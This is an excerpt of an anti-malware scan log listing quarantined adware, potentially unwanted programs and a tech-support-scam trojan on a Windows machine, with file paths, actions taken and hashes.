    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1bbb8404765647f2_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1c5fcd22760ae4fa_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1cded087ba08781e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1da65e1f0bf08b85_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\20368b565781ca23_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\20ba09d6c64db51a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\21a858822d051fc2_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\2217bfb359cd14cc_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\229495477454a820_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\234986793e71f265_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\50419e9a955e578f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\51783746d3ebb106_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\52826674b9f2322f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\52831aa7f278403d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\52d6acef1cef9bd8_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\53b332c52082d7b0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\54df9ef19c57b2e6_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5519176c8288a1f4_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\558aa2025efdc9f3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\56da2cf07e157aed_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5747b60c048e99e1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\575096e145d8e7dc_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d118f336e2cd22e5_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d4a5cd921965b690_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d512b2657371334d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d641130adedfa93d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d6b2fa9ac1d23187_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d700d96aef681264_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d71e7b4962e9f160_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d73d3f3028d6ceb8_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d7d896af091b5ed6_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d81aa319d82431d1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d8a65c9a08ff830b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d91f40ebc3aea22c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d928bf4e3b671328_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\aaf408a4d5d14baf_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\aba4d33f6f9c5d7b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\ac9268452e285e5f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\ad5b57227d69c3d2_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\af8c2395d8796c0d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\afa3e6adf48b168e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\afdee28a0ea89ea6_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b0847b9dc32c6a06_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b1473a2812cd3a83_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b19600b30866b901_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b249e66422cc95dd_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b2dfbe608f167e4a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b330090b68bfee31_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f3d544637eaeffad_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f5477bd3c0684b82_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f552ab47376f113e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f588cf0fafbbb8aa_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f5aba122a0ef6386_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f6587b15ff9d2095_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f6f8e87f5363c359_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f72cf1bf0ba490a7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e28dad4eb518817f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e3415dfd9ef788e7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e39b8fcfce4c4350_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e45841fbf11f0a83_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e4c124f94bfdf35b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e4d561d03df3736b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e4fc863b614c6708_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e564e60954b258c1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\bc36a3b7355cadee_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\bc9139e632f9ad2a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\bd48447363dfb226_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\bd6189fff1814b2c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\be104a3a602e2429_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c02ce300b153b696_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c0c650d3522461d9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c15bf0e9c74540f4_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c18c16a141a78505_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c29f69b54a69cf07_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c4248626a9c9365d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c4ce41dea84c8896_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c7362bd4f27d3f19_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c7495f8c1d96097d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c78f793964c41aa3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c962e89206bb51a1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cacfb6cc1374e821_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\892057f841c78e8c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\897a91586411223c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8982979593163d88_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8a68a7ae4d06e528_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8ae3c0d1e6c52ee0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8b62b05d51f740fb_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8c1caaaa17f54e71_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8c9c2eebf6e94ad9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8e37269897840de8_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8ebb5551dbad3b7a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8f601d2f8b4278f0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\906a6b72ea69066b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\90c0121161366734_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\90cd588e91684d04_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\90d6823b7aa7a266_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\044f10f0e45b2e7c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\062e5d03b09b1ae8_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\06484cf527ab201c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\06ce8df5ff1ae4ae_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\074fd2dd7ccad822_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\07b6f66686ae528a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\index-dir\the-real-index, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\file__0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\file__0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_cdncache-a.akamaihd.net_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_cdncache-a.akamaihd.net_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_cjs.linkbolic.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_cjs.linkbolic.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_static.donation-tools.org_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_static.donation-tools.org_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_v3x3b3b5.map2.ssl.hwcdn.net_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_v3x3b3b5.map2.ssl.hwcdn.net_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_nps.pastaleads.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_nps.pastaleads.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_pstatic.eshopcomp.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_pstatic.eshopcomp.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_q2u3z6t7.ssl.hwcdn.net_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_q2u3z6t7.ssl.hwcdn.net_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_www.imdb.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_www.imdb.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    Trojan.TechSupportScam, C:\Windows\System32\Tasks\nerta, Quarantined, [f2adb6bdeeac24124fdf10df2fd58080],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\log.txt, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertastarter.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\bto.ico, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Caliburn.Micro.dll, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Caliburn.Micro.pdb, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Caliburn.Micro.xml, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Comparers.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Garlic.dll, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Garlic.pdb, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\InstallUtil.InstallLog, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Ionic.Zip.Reduced.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\LedControl.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\LoggingControl.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Microsoft.Win32.TaskScheduler.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Microsoft.Windows.Shell.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.exe, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.pdb, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.vshost.exe, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\NERTA.vshost.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.vshost.exe.manifest, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.InstallLog, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.InstallState, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.pdb, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertastarter.exe, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Newtonsoft.Json.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Newtonsoft.Json.xml, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nrtupdates.exe, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nrtupdates.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\PDSA.Common.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\System.Windows.Interactivity.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\System.Windows.Interactivity.xml, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\testwcf.exe, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\testwcf.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\UrlHistoryLibrary.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    PUP.Optional.DesktopFind, C:\ProgramData\desktopfindkey\desktop189.exe, Delete-on-Reboot, [7b24aec5f5a56acc684eedf161a302fe],
    PUP.Optional.TempLaunch, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, Delete-on-Reboot, [a8f7155e1c7e48ee1334a328788a669a],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}\1.5\config.js, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}\1.5\tree.js, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}\1.5\wlist.js, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\sma.exe, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smci32.dll, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
